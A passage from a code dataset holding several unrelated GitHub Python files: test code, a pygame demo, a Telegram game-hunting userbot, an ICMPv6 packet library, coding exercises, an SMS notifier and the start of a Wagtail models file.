self.assertRaises(exc.OperationalError, self.run_gen, f)\n\n @with_cursor\n @gen_test\n def test_poll(self, cursor):\n\n @gen.engine\n def f():\n yield cursor.poll()\n self.stop()\n\n self.assertRaises(presto.ProgrammingError, self.run_gen, f)\n\n yield cursor.execute('SELECT * FROM one_row')\n while True:\n status = yield cursor.poll()\n if status is None:\n break\n self.assertIn('stats', status)\n\n def fail(*args, **kwargs):\n self.fail(\"Should not need requests.get after done polling\") # pragma: no cover\n\n with mock.patch.object(AsyncHTTPClient, 'fetch') as fetch:\n fetch.side_effect = fail\n self.assertEqual((yield cursor.fetchall()), [[1]])\n","repo_name":"jianingy/prestornado","sub_path":"prestornado/tests/test_prestornado.py","file_name":"test_prestornado.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"70640939414","text":"import pygame\n\n# Define grid and block size\nGRID_WIDTH = 12\nGRID_HEIGHT = 16\nBLOCK_SIZE = 20\n\nclass GridBlock:\n def __init__(self, grid_x, grid_y):\n self.grid_x = grid_x\n self.grid_y = grid_y\n self.screen_x = grid_x * BLOCK_SIZE\n self.screen_y = grid_y * BLOCK_SIZE\n self.color = (255, 0, 0) # Example color (red)\n\n def draw(self, screen):\n pygame.draw.rect(screen, self.color, (self.screen_x, self.screen_y, BLOCK_SIZE, BLOCK_SIZE))\n\n# Initialize Pygame\npygame.init()\n\n# Set up the game window\nscreen_width = GRID_WIDTH * BLOCK_SIZE\nscreen_height = GRID_HEIGHT * BLOCK_SIZE\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Grid Example\")\n\n# Create a grid of blocks\ngrid = [[GridBlock(x, y) for x in range(GRID_WIDTH)] for y in range(GRID_HEIGHT)]\n\n# Main game loop\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Draw everything\n screen.fill((255, 255, 255)) # Fill the screen with white\n\n # Draw the grid\n for row in grid:\n for block in row:\n block.draw(screen)\n\n pygame.display.flip()\n\n# Quit Pygame\npygame.quit()\n","repo_name":"np123-glitch/pythonsnakegame","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25120461780","text":"from telethon.sync import TelegramClient\nfrom telethon import events\nimport asyncio\nfrom telethon.sessions import StringSession\nfrom telethon import events\nfrom constants import CMD_PREFIX\nfrom constants import API_HASH, API_ID, SESSION_KEY\nimport time\n\npoke_list = [ 'Mewtwo', 'Aerodactyl', 'Alakazam', 'Greninja', 'Pheromosa', 'Flabebe', 'Muk', 'Froakie', 'Frogadier', 'Floette', 'Poiple', 'Primarina', 'Grimer', 'Muk',\n 'Skrelp', 'Dragalge', 'Sneasel', 'weavile', 'Cosmog', 'Cosmeom', 'Zubat', 'Golbat', 'Crobat']\n\npoke_list2 = ['Found!', '', 'Ninjask', 'Aerodactyl', '', '', 'Mewtwo', 'Mew', 'Deoxys', '', 'Groudon', 'Kyogre', 'Rayquaza', '', 'Diancie', 'Slaking', 'Dialga',\n 'Palkia', 'Arceus', 'Regigigas', 'Darkrai', 'Cressellia', 'Giratina', '', '', 'Reshiram', 'Zekrom', 'Kyurem', 'Landorus', 'Thundurus', 'Tornadus', 'Meloetta', 'Greninja',\n 'Xerneas', 'Yveltal', 'Zygarde', 'Hoopa', 'Cosmog', 'Cosmoem', 'Solgaleo', 'Lunala', 'Necrozma', 'Magearna', 'Marshadow', 'Pheromosa', 'Poipole', 'Naganadel',\n 'Zeraora', 'Pheromosa', 'Sylveon', 'Metagross']\n\n#Thanks Anil Vro\nwith TelegramClient(StringSession(SESSION_KEY), API_ID, API_HASH,) as client:\n\n\n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"hexamatch (.*) (\\w+)\"))\n async def hexamatch(event):\n bid = 572621020\n msg = \"/hunt\"\n times_hunt = event.pattern_match.group(1)\n set_sec = event.pattern_match.group(2)\n eta = int((int(times_hunt) * int(set_sec))/60)\n if not times_hunt.isnumeric():\n text = \"`Onii-sama nHunts and nSex both must be integers :)`\"\n await event.edit(text)\n else:\n await event.edit(\n f\"\\n`Yo, Shido 🙋🏻`\"\n f\"\\n\\n`I will be hunting {times_hunt} times.`\"\n f\"\\n\\n`I will stop the hunting if I encounter any poke from the list.`\"\n f\"\\n\\n`ETA for this hunt is around {eta} minutes.`\")\n async with client.conversation('Hexamonbot') as conv:\n for i in range(int(times_hunt)):\n await conv.send_message('/hunt')\n if int(i) == int(times_hunt)-1:\n await event.reply(\"`Hunting complete.`\")\n else:\n poke_r = await conv.get_response()\n get_res_msg = poke_r.text.split(\" \")\n get_poke_n = get_res_msg[2].replace(\"**\",\"\") \n \n if get_poke_n in poke_list:\n print(f'In list: {get_poke_n}')\n await event.reply(f\"Shido-San, {get_poke_n} has appeared. Let\\'s catch it.\") \n break\n else:\n time.sleep(int(set_sec))\n \n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"hexa (.*) (\\w+)\"))\n async def hexa(event):\n bid = 572621020\n msg = \"/hunt\"\n times_hunt = event.pattern_match.group(1)\n set_sec = event.pattern_match.group(2)\n eta = int((int(times_hunt) * int(set_sec))/60)\n if not times_hunt.isnumeric():\n text = \"`Onii-sama nHunts and nSex both must be integers :)`\"\n await event.edit(text)\n else:\n await event.edit(\n f\"\\n`Yo, Shido 🙋🏻`\"\n f\"\\n\\n`I will be hunting {times_hunt} times.`\"\n f\"\\n\\n`ETA for this hunt is around {eta} minutes.`\")\n for i in range(int(times_hunt)):\n await client.send_message(bid,msg)\n if int(i) == int(times_hunt)-1:\n await event.reply(\"`Hunting complete.`\")\n else:\n time.sleep(int(set_sec))\n\n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"list\"))\n async def list(event):\n await event.reply(\n f\"`{poke_list}`\"\n f\"`\\n\\nEdit the list in main.py on GitHub.`\")\n\n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"restart\"))\n async def shutdown_handler(event):\n CMD = CMD_PREFIX[1:]\n await event.edit(f\"**Restarting...**\")\n time.sleep(int(3))\n await event.edit(f\"**Restarted!**\")\n await client.disconnect()\n \n client.run_until_disconnected()\n","repo_name":"shidoxd/yunoxpro","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4571094549","text":"import struct\nfrom ipaddress import IPv6Address\nfrom abc import ABCMeta\n\nfrom .icmp import ICMP, ICMPData, ICMPEchoRequest, ICMPEchoReply\nfrom .common import ICMPv6Type, ICMPv6TypeCodeMap, ICMPv6OptionNumber\nfrom .common import checksum as csum\nfrom ..address import EthAddr\nfrom ..exceptions import *\nfrom sys import byteorder\n\n\n'''\nReferences:\n http://tools.ietf.org/html/rfc4443 (Neighbor Discovery)\n http://tools.ietf.org/html/rfc2710 (Mulicast Listener Discovery)\n Stevens, Fall, TCP/IP Illustrated, Vol 1., 2nd Ed.\n'''\n\n\nclass ICMPv6(ICMP):\n def __init__(self, **kwargs):\n # Another hacky way to make this thing work.. super should be last..\n if 'icmptype' in kwargs:\n self.icmp6type = kwargs['icmptype']\n del kwargs['icmptype']\n super().__init__(**kwargs)\n if hasattr(self, \"icmp6type\"):\n kwargs['icmptype'] = self.icmp6type\n\n self._valid_types = ICMPv6Type\n self._valid_codes_map = ICMPv6TypeCodeMap\n self._classtype_from_icmptype = ICMPv6ClassFromType\n self._icmptype_from_classtype = ICMPv6TypeFromClass\n self._type = self._valid_types.EchoRequest\n self._code = self._valid_codes_map[self._type].EchoRequest\n self._icmpdata = ICMPv6ClassFromType(self._type)()\n self._checksum = 0\n # if kwargs are given, must ensure that type gets set\n # before code due to dependencies on validity.\n if 'icmptype' in kwargs:\n self.icmptype = kwargs['icmptype']\n # del kwargs['icmptype']\n\n def checksum(self):\n return self._checksum\n\n def _compute_checksum(self, src, dst, raw):\n sep = b''\n databytes = self._icmpdata.to_bytes()\n icmpsize = ICMP._MINLEN+len(databytes)\n self._checksum = csum(sep.join((src.packed, dst.packed,\n struct.pack('!I3xBBB',\n ICMP._MINLEN+len(databytes),\n 58,\n self._type.value,\n self._code.value),\n databytes)))\n\n def pre_serialize(self, raw, pkt, i):\n ip6hdr = pkt.get_header('IPv6')\n assert(ip6hdr is not None)\n self._compute_checksum(ip6hdr.src, ip6hdr.dst, raw)\n\n\nclass ICMPv6Option(object, metaclass=ABCMeta):\n _PACKFMT = 'B'\n __slots__ = ['_optnum']\n\n def __init__(self, optnum):\n self._optnum = ICMPv6OptionNumber(optnum)\n\n @property\n def optnum(self):\n return self._optnum\n\n def length(self):\n return struct.calcsize(ICMPv6Option._PACKFMT)\n\n def to_bytes(self):\n return struct.pack(ICMPv6Option._PACKFMT, self._optnum.value)\n\n def from_bytes(self, raw):\n return self.length()\n\n def __eq__(self, other):\n return self._optnum == other._optnum\n\n def __str__(self):\n return \"{}\".format(self.__class__.__name__)\n\n\nclass ICMPv6OptionLinkLayerAddress(ICMPv6Option):\n def __init__(self, address=None):\n super().__init__(self._ICMPv6OptionType)\n self._linklayeraddress = EthAddr(address)\n\n def to_bytes(self):\n value = self._linklayeraddress.packed\n length = int.to_bytes(int((len(v) + 2)/8), length=1,\n byteorder=byteorder, signed=False)\n xtype = int.to_bytes(self._ICMPv6OptionType, length=1,\n byteorder=byteorder, signed=False)\n return xtype+length+value\n\n def from_bytes(self, raw):\n type_ = raw[0]\n assert type_ == self._ICMPv6OptionType\n length_ = raw[1] * 8\n # length of option header (t + l + v = 2 + length_)\n # current implementation supports only Ethernet addresses\n assert (length_ - 2) == len(EthAddr())\n self._linklayeraddress = EthAddr(raw[2:length_])\n return length_\n\n def __str__(self):\n return \"{} {}\".format(super().__str__(), self._linklayeraddress)\n\n\nclass ICMPv6OptionSourceLinkLayerAddress(ICMPv6OptionLinkLayerAddress):\n _ICMPv6OptionType = ICMPv6OptionNumber.SourceLinkLayerAddress\n\n\nclass ICMPv6OptionTargetLinkLayerAddress(ICMPv6OptionLinkLayerAddress):\n _ICMPv6OptionType = ICMPv6OptionNumber.TargetLinkLayerAddress\n\n\nclass ICMPv6OptionPrefixInformation(ICMPv6Option):\n pass\n\n\nclass ICMPv6OptionRedirectedHeader(ICMPv6Option):\n _PACKFMT = \"!xxxxxx\"\n _reservedbytes = b'\\x00' * 6\n _max_pkt_len = 8 * 100 # FIXME: hack: arbitrary length; enough for hdrs\n\n def __init__(self, redirected_packet=None):\n if redirected_packet is not None:\n # FIXME: todo: Truncate frame to path MTU?!\n # for now, quick hack to just header and some data\n data = redirected_packet.to_bytes()\n data_length = int((len(data) + 2)/8) * 8\n\n if data_length > self._max_pkt_len: # cut to 200B\n data_length = data_length - self._max_pkt_len\n\n # data_length - 2, so option header fits into units on 8 octets\n self._packetdata = redirected_packet.to_bytes()[:(data_length-2)]\n else:\n self._packetdata = None\n\n def to_bytes(self):\n value = ICMPv6OptionRedirectedHeader._reservedbytes + self._packetdata\n\n # FIXME: truncate to 8 octet group\n data_length = int((len(v) + 2)/8)\n length = int.to_bytes(data_length, length=1,\n byteorder=byteorder, signed=False)\n xtype = int.to_bytes(ICMPv6OptionNumber.RedirectedHeader, length=1,\n byteorder=byteorder, signed=False)\n return xtype+length+value[:(data_length*8)-2]\n\n def from_bytes(self, raw):\n type_ = raw[0]\n assert type_ == ICMPv6OptionNumber.RedirectedHeader\n length_ = raw[1] * 8\n # length of option header (t + l + v = 2 + length_)\n\n self._packetdata = raw[2:length_]\n return length_\n\n def __str__(self):\n return \"{} Enclosed packet ({} bytes)\".format(\n super().__str__(), len(self._packetdata))\n\n\nclass ICMPv6OptionMTU(ICMPv6Option):\n pass\n\n\nICMPv6OptionClasses = {\n ICMPv6OptionNumber.SourceLinkLayerAddress:\n ICMPv6OptionSourceLinkLayerAddress,\n ICMPv6OptionNumber.TargetLinkLayerAddress:\n ICMPv6OptionTargetLinkLayerAddress,\n ICMPv6OptionNumber.PrefixInformation: ICMPv6OptionPrefixInformation,\n ICMPv6OptionNumber.RedirectedHeader: ICMPv6OptionRedirectedHeader,\n ICMPv6OptionNumber.MTU: ICMPv6OptionMTU\n}\n\n\nclass ICMPv6OptionList(object):\n def __init__(self):\n self._options = []\n\n @staticmethod\n def from_bytes(rawbytes):\n '''\n Takes a byte string as a parameter and returns a list of\n ICMPv6Option objects.\n '''\n icmpv6popts = ICMPv6OptionList()\n\n i = 0\n while i < len(rawbytes):\n opttype = rawbytes[i]\n optnum = ICMPv6OptionNumber(opttype)\n obj = ICMPv6OptionClasses[optnum]()\n eaten = obj.from_bytes(rawbytes[i:])\n i += eaten\n icmpv6popts.append(obj)\n return icmpv6popts\n\n def to_bytes(self):\n '''\n Takes a list of ICMPv6Option objects and returns a packed byte string\n of options, appropriately padded if necessary.\n '''\n raw = b''\n if not self._options:\n return raw\n for icmpv6popt in self._options:\n raw += icmpv6popt.to_bytes()\n # Padding doesn't seem necessary?\n # RFC states it should be padded to 'natural 64bit boundaries'\n # However, wireshark interprets \\x00 as a malformed option field\n # So for now, ignore padding\n # padbytes = 4 - (len(raw) % 4)\n # raw += b'\\x00'*padbytes\n return raw\n\n def append(self, opt):\n if isinstance(opt, ICMPv6Option):\n self._options.append(opt)\n else:\n raise Exception(\"Option to be added must be an ICMPv6Option \" +\n \"object ( is {} )\".format(type(opt)))\n\n def __len__(self):\n return len(self._options)\n\n def __getitem__(self, i):\n if i < 0:\n i = len(self._options) + i\n if 0 <= i < len(self._options):\n return self._options[i]\n raise IndexError(\"Invalid IP option index\")\n\n def __setitem__(self, i, val):\n if i < 0:\n i = len(self._options) + i\n if not issubclass(val.__class__, ICMPv6Option):\n raise ValueError(\"Assigned value must be of type ICMPv6Option, \" +\n \"but {} is not.\".format(val.__class__.__name__))\n if 0 <= i < len(self._options):\n self._options[i] = val\n else:\n raise IndexError(\"Invalid IP option index\")\n\n def __delitem__(self, i):\n if i < 0:\n i = len(self._options) + i\n if 0 <= i < len(self._options):\n del self._options[i]\n else:\n raise IndexError(\"Invalid IP option index\")\n\n def raw_length(self):\n return len(self.to_bytes())\n\n def size(self):\n return len(self._options)\n\n def __eq__(self, other):\n if not isinstance(other, ICMPv6OptionList):\n return False\n if len(self._options) != len(other._options):\n return False\n return self._options == other._options\n\n def __str__(self):\n return \"{} ({})\".format(\n self.__class__.__name__,\n \", \".join([str(opt) for opt in self._options]))\n\n\nclass ICMPv6Data(ICMPData):\n '''Hack to make the inheritance chain happy and lead into v6-specific\n differences; need to fix...'''\n def __init__(self, **kwargs):\n self._options = ICMPv6OptionList()\n super().__init__(**kwargs)\n\n @property\n def options(self):\n return self._options\n\n\nclass ICMPv6EchoRequest(ICMPEchoRequest):\n pass\n\n\nclass ICMPv6EchoReply(ICMPEchoReply):\n pass\n\n\nclass ICMPv6HomeAgentAddressDiscoveryRequestMessage(ICMPv6Data):\n pass\n\n\nclass ICMPv6HomeAgentAddressDiscoveryReplyMessage(ICMPv6Data):\n pass\n\n\nclass ICMPv6MobilePrefixSolicitation(ICMPv6Data):\n pass\n\n\nclass ICMPv6MobilePrefixAdvertisement(ICMPv6Data):\n pass\n\n\nclass ICMPv6MulticastListenerQuery(ICMPv6Data):\n pass\n\n\nclass ICMPv6MulticastListenerReport(ICMPv6Data):\n pass\n\n\nclass ICMPv6MulticastListenerDone(ICMPv6Data):\n pass\n\n\nclass ICMPv6RouterSolicitation(ICMPv6Data):\n pass\n\n\nclass ICMPv6RouterAdvertisement(ICMPv6Data):\n pass\n\n\nclass ICMPv6NeighborSolicitation(ICMPv6Data):\n __slots__ = ['_targetaddr']\n _PACKFMT = \"!xxxx16s\"\n _MINLEN = struct.calcsize(_PACKFMT)\n '''\n possible options:\n * source_link_layer_address: link layer address of sending host\n '''\n\n def __init__(self, **kwargs):\n self._targetaddr = IPv6Address(\"::0\")\n super().__init__(**kwargs)\n\n def to_bytes(self):\n return b''.join((\n struct.pack(ICMPv6NeighborSolicitation._PACKFMT,\n self._targetaddr.packed),\n self._options.to_bytes(), super().to_bytes()))\n\n def from_bytes(self, raw):\n if len(raw) < ICMPv6NeighborSolicitation._MINLEN:\n raise NotEnoughDataError(\"Not enough bytes to unpack \" +\n \"ICMPv6NeighborSolicitation object\")\n optionbytes = raw[ICMPv6NeighborSolicitation._MINLEN:]\n fields = struct.unpack(ICMPv6NeighborSolicitation._PACKFMT,\n raw[:ICMPv6NeighborSolicitation._MINLEN])\n self._targetaddr = IPv6Address(fields[0])\n self._options = ICMPv6OptionList.from_bytes(optionbytes)\n\n @property\n def targetaddr(self):\n return self._targetaddr\n\n @targetaddr.setter\n def targetaddr(self, value):\n print(\"setting target address: {}\".format(IPv6Address(value)))\n self._targetaddr = IPv6Address(value)\n\n def __str__(self):\n s = \"Target address: {}\".format(self._targetaddr)\n if len(self._options) > 0:\n s = \"{} | {}\".format(s, self._options)\n return s\n\n\nclass ICMPv6NeighborAdvertisement(ICMPv6Data):\n __slots__ = ['_R_S_O', '_targetaddr']\n _PACKFMT = \"!cxxx16s\"\n _MINLEN = struct.calcsize(_PACKFMT)\n '''\n possible options:\n * source_link_layer_address: link layer address of sending host\n '''\n def __init__(self, **kwargs):\n self._targetaddr = IPv6Address(\"::0\")\n self._routerflag = 0\n self._solicitedflag = 0\n self._overrideflag = 0\n super().__init__(**kwargs)\n\n def to_bytes(self):\n return b''.join((\n struct.pack(ICMPv6NeighborAdvertisement._PACKFMT,\n self.get_rso_byte(),\n self._targetaddr.packed),\n self._options.to_bytes(), super().to_bytes()))\n\n def from_bytes(self, raw):\n if len(raw) < self._MINLEN:\n raise NotEnoughDataError(\"Not enough bytes to unpack \" +\n \"ICMPv6NeighborAdvertisement object\")\n optionbytes = raw[ICMPv6NeighborAdvertisement._MINLEN:]\n fields = struct.unpack(\n ICMPv6NeighborAdvertisement._PACKFMT,\n raw[:ICMPv6NeighborAdvertisement._MINLEN])\n # print('fields[0]: {}'.format(fields[0]))\n rso = int.from_bytes(fields[0], byteorder=byteorder, signed=False)\n self._routerflag = (rso & 0x80) >> 7\n self._solicitedflag = (rso & 0x40) >> 6\n self._overrideflag = (rso & 0x20) >> 5\n self._targetaddr = IPv6Address(fields[1])\n self._options = ICMPv6OptionList.from_bytes(optionbytes)\n\n def get_rso_byte(self):\n rso = self._routerflag << 7 | \\\n self._solicitedflag << 6 | \\\n self._overrideflag << 5\n return int.to_bytes(rso, length=1, byteorder=byteorder, signed=False)\n\n def get_rso_str(self):\n s = ''\n if self.routerflag:\n s += 'R'\n if self.solicitedflag:\n s += 'S'\n if self.overrideflag:\n s += 'O'\n return s\n\n @property\n def targetaddr(self):\n return self._targetaddr\n\n @targetaddr.setter\n def targetaddr(self, value):\n self._targetaddr = IPv6Address(value)\n\n @property\n def routerflag(self):\n return bool(self._routerflag)\n\n @property\n def solicitedflag(self):\n return bool(self._solicitedflag)\n\n @property\n def overrideflag(self):\n return bool(self._overrideflag)\n\n @routerflag.setter\n def routerflag(self, value):\n assert isinstance(value, bool)\n self._routerflag = int(value)\n\n @solicitedflag.setter\n def solicitedflag(self, value):\n assert isinstance(value, bool)\n self._solicitedflag = int(value)\n\n @overrideflag.setter\n def overrideflag(self, value):\n assert isinstance(value, bool)\n self._overrideflag = int(value)\n\n def __str__(self):\n s = \"Target address: {} flags: {} ({})\".format(\n self._targetaddr,\n hex(int.from_bytes(self.get_rso_byte(),\n byteorder=byteorder, signed=False)),\n self.get_rso_str())\n if len(self._options) > 0:\n s = \"{} | {}\".format(s, self._options)\n return s\n\n\nclass ICMPv6RedirectMessage(ICMPv6Data):\n __slots__ = ['_targetaddr', '_destinationaddr']\n _PACKFMT = \"!xxxx16s16s\"\n _MINLEN = struct.calcsize(_PACKFMT)\n '''\n possible options:\n * target_link_layer_address: link layer address of sending host\n * redirected_header: link layer address of sending host\n '''\n\n def __init__(self, **kwargs):\n self._targetaddr = IPv6Address(\"::0\")\n self._destinationaddr = IPv6Address(\"::0\")\n super().__init__(**kwargs)\n\n def to_bytes(self):\n return b''.join((struct.pack(\n ICMPv6RedirectMessage._PACKFMT,\n self._targetaddr.packed, self._destinationaddr.packed),\n self._options.to_bytes(), super().to_bytes()))\n\n def from_bytes(self, raw):\n if len(raw) < self._MINLEN:\n raise NotEnoughDataError(\"Not enough bytes to unpack \" +\n \"ICMPv6RedirectMessage object\")\n optionbytes = raw[self._MINLEN:]\n fields = struct.unpack(\n ICMPv6RedirectMessage._PACKFMT,\n raw[:ICMPv6RedirectMessage._MINLEN])\n self._targetaddr = IPv6Address(fields[0])\n self._destinationaddr = IPv6Address(fields[1])\n self._options = ICMPv6OptionList.from_bytes(optionbytes)\n\n @property\n def targetaddr(self):\n return self._targetaddr\n\n @targetaddr.setter\n def targetaddr(self, value):\n self._targetaddr = IPv6Address(value)\n\n @property\n def destinationaddr(self):\n return self._targetaddr\n\n @destinationaddr.setter\n def destinationaddr(self, value):\n self._destinationaddr = IPv6Address(value)\n\n def __str__(self):\n s = \"Target: {} Destination: {}\".format(\n self._targetaddr,\n self._targetaddr)\n if len(self._options) > 0:\n s = \"{} | {}\".format(s, self._options)\n return s\n\n\ndef construct_icmpv6_class_map():\n clsmap = {}\n for xtype in ICMPv6Type:\n clsname = \"ICMPv6{}\".format(xtype.name)\n try:\n cls = eval(clsname)\n except:\n cls = None\n clsmap[xtype] = cls\n\n def inner(icmptype):\n icmptype = ICMPv6Type(icmptype)\n return clsmap.get(icmptype, None)\n return inner\n\n\ndef construct_icmpv6_type_map():\n typemap = {}\n for xtype in ICMPv6Type:\n clsname = \"ICMPv6{}\".format(xtype.name)\n try:\n cls = eval(clsname)\n typemap[cls] = xtype\n except:\n pass\n\n def inner(icmpcls):\n return typemap.get(icmpcls, None)\n return inner\n\n\nICMPv6ClassFromType = construct_icmpv6_class_map()\nICMPv6TypeFromClass = construct_icmpv6_type_map()\n","repo_name":"cppbear/NJU_CN2020","sub_path":"switchyard/lib/packet/icmpv6.py","file_name":"icmpv6.py","file_ext":"py","file_size_in_byte":18001,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"67"} +{"seq_id":"13505181662","text":"class Person:\n def __init__(self, firstName, lastName, idNumber):\n self.firstName = firstName\n self.lastName = lastName\n self.idNumber = idNumber\n\n def printPerson(self):\n print(\"Name:\", self.lastName + \",\", self.firstName)\n print(\"ID:\", self.idNumber)\n\n\nclass Student(Person):\n # Class Constructor\n # Parameters:\n # firstName - A string denoting the Person's first name.\n # lastName - A string denoting the Person's last name.\n # id - An integer denoting the Person's ID number.\n # scores - An array of integers denoting the Person's test scores.\n def __init__(self, firstName, lastName, idNumber, scores):\n self.scores = scores\n super().__init__(firstName, lastName, idNumber)\n\n\n # Function Name: calculate\n # Return: A character denoting the grade.\n def calculate(self):\n\n average = sum(self.scores) / len(self.scores)\n if 90 <= average <= 100: return 'O'\n if 80 <= average <= 90: return 'E'\n if 70 <= average <= 80: return 'A'\n if 55 <= average <= 70: return 'P'\n if 40 <= average <= 55: return 'D'\n if average < 40: return 'T'\n\nif __name__ == '__main__':\n# firstName,lastName,idNum = input().split()\n# scores = list(map(int, input().split()))\n# s = Student(firstName, lastName, idNum, scores)\n s = Student('Anton', 'Ramancou', 174888, [50,60,70])\n s.printPerson()\n print(\"Grade:\", s.calculate())\n","repo_name":"Rc561U/Python_self_education","sub_path":"HackerRank/Day12/Inheritance.py","file_name":"Inheritance.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70639484375","text":"'''\r\n괄호\r\nhttps://www.acmicpc.net/problem/9012\r\n'''\r\nT = int(input()) # 테스트케이스\r\nstring = []\r\nstack = []\r\nfor _ in range(T):\r\n string = list(input()) # 괄호 문자열 입력\r\n\r\n for s in string:\r\n if s == '(':\r\n stack.append(s)\r\n else:\r\n top = len(stack) - 1\r\n if top >= 0 and stack[top] == '(':\r\n stack.pop()\r\n else:\r\n stack.append(s)\r\n \r\n if len(stack) == 0:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\n stack.clear()","repo_name":"buyeolim/ps_prac","sub_path":"BOJ/python3/9012.py","file_name":"9012.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13952074118","text":"#/usr/bin/env python2\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\nimport gobject\nimport pynotify\n\nbus_name = \"org.freedesktop.ModemManager1\"\nsms_base_object = \"/org/freedesktop/ModemManager1/SMS/\"\nmodem_object = \"/org/freedesktop/ModemManager1/Modem/0\"\n\nDBusGMainLoop(set_as_default=True)\n\nsystem_bus = dbus.SystemBus()\n\nclass mm_sms:\n def _get_manager(self, interface):\n sms_proxy = system_bus.get_object(bus_name, self.sms_path)\n return dbus.Interface(sms_proxy, interface)\n \n def _get_properties_manager(self):\n return self._get_manager(\"org.freedesktop.DBus.Properties\")\n \n def _get_sms_manager(self):\n return self._get_manager(\"org.freedesktop.ModemManager1.Sms\")\n\n def _load_sms(self, sms_path):\n self.sms_path = sms_path\n sms_manager = self._get_properties_manager()\n self.text = sms_manager.Get(bus_name + \".Sms\", \"Text\")\n self.sender = sms_manager.Get(bus_name + \".Sms\", \"Number\")\n self.received = True\n\n def _create_sms(self, recipient, text):\n self.sms_path = self._modem.create_message(recipient, text)\n self.received = False\n self.text = text\n self.recipient = recipient\n\n def __init__(self, sms_path = None, recipient = None, text = None, \n modem = None):\n self.sms_path = None\n self.sender = None\n self.received = None\n self.recipient = None\n self._modem = modem\n if sms_path != None:\n self._load_sms(sms_path)\n elif recipient != None:\n self._create_sms(recipient, text)\n\n def pretty(self):\n if (self.received == True):\n return (\"SMS %s from <%s> says: %s\" \n % (self.sms_path, self.sender, self.text))\n elif (self.received == False):\n return (\"SMS %s to <%s> says: %s\" \n % (self.sms_path, self.recipient, self.text))\n\n def delete_from_modem(self):\n self._modem.delete_message(self.sms_path)\n\n def send(self):\n sms_manager = self._get_sms_manager()\n sms_manager.Send()\n\nclass mm_modem_messaging:\n def __init__(self, modem_id = 0):\n self._messaging_proxy = system_bus.get_object(bus_name, modem_object)\n self._messaging_manager = dbus.Interface(self._messaging_proxy,\n \"org.freedesktop.ModemManager1.Modem.Messaging\")\n \n def delete_message(self, path):\n self._messaging_manager.Delete(path)\n\n def add_added_callback(self, handler):\n self._messaging_manager.connect_to_signal(\"Added\", handler)\n\n def create_message(self, number, text):\n return self._messaging_manager.Create({\n 'number': number, \n 'text': text,\n })\n \nmodem = mm_modem_messaging()\n\ndef handler(path = None, received = None):\n print(\"Got signal from %s, received = %d\" % (path, received))\n sms = mm_sms(sms_path = path, modem = modem)\n print(sms.pretty())\n title = \"SMS Received from %s\" % sms.sender\n text = sms.text\n icon = \"/usr/share/icons/Tango/32x32/status/sunny.png\"\n pynotify.init(\"Test Application\")\n notification = pynotify.Notification(title, text, icon) \n notification.set_urgency(pynotify.URGENCY_NORMAL)\n notification.show() \n sms.delete_from_modem()\n\nmodem.add_added_callback(handler)\n#sms = mm_sms(modem = modem, recipient = '+49-and-so-on', text = 'Test')\n#sms.send()\nloop = gobject.MainLoop()\nloop.run()\n","repo_name":"naseschwarz/sms-notify","sub_path":"sms-notify.py","file_name":"sms-notify.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1350061648","text":"from datetime import date\n\nfrom django.db import models\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom wagtail.wagtailcore.models import Page, Orderable\nfrom wagtail.wagtailcore.fields import RichTextField\nfrom wagtail.wagtailadmin.edit_handlers import FieldPanel, MultiFieldPanel, \\\n InlinePanel, PageChooserPanel\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailimages.models import Image\nfrom wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel\nfrom wagtail.wagtailsnippets.models import register_snippet\nfrom wagtail.wagtailforms.models import AbstractEmailForm, AbstractFormField\nfrom wagtail.wagtailsearch import index\n\nfrom modelcluster.fields import ParentalKey\nfrom modelcluster.tags import ClusterTaggableManager\nfrom taggit.models import Tag, TaggedItemBase\n \nfrom ethagaval.utils import export_event\n\n\nEVENT_AUDIENCE_CHOICES = (\n ('public', \"Public\"),\n ('private', \"Private\"),\n)\n\n\n# A couple of abstract classes that contain commonly used fields\n\nclass LinkFields(models.Model):\n link_external = models.URLField(\"External link\", blank=True)\n link_page = models.ForeignKey(\n 'wagtailcore.Page',\n null=True,\n blank=True,\n related_name='+'\n )\n link_document = models.ForeignKey(\n 'wagtaildocs.Document',\n null=True,\n blank=True,\n related_name='+'\n )\n\n @property\n def link(self):\n if self.link_page:\n return self.link_page.url\n elif self.link_document:\n return self.link_document.url\n else:\n return self.link_external\n\n panels = [\n FieldPanel('link_external'),\n PageChooserPanel('link_page'),\n DocumentChooserPanel('link_document'),\n ]\n\n class Meta:\n abstract = True\n\n\nclass ContactFields(models.Model):\n telephone = models.CharField(max_length=20, blank=True)\n email = models.EmailField(blank=True)\n address_1 = models.CharField(max_length=255, blank=True)\n address_2 = models.CharField(max_length=255, blank=True)\n city = models.CharField(max_length=255, blank=True)\n country = models.CharField(max_length=255, blank=True)\n post_code = models.CharField(max_length=10, blank=True)\n\n panels = [\n FieldPanel('telephone'),\n FieldPanel('email'),\n 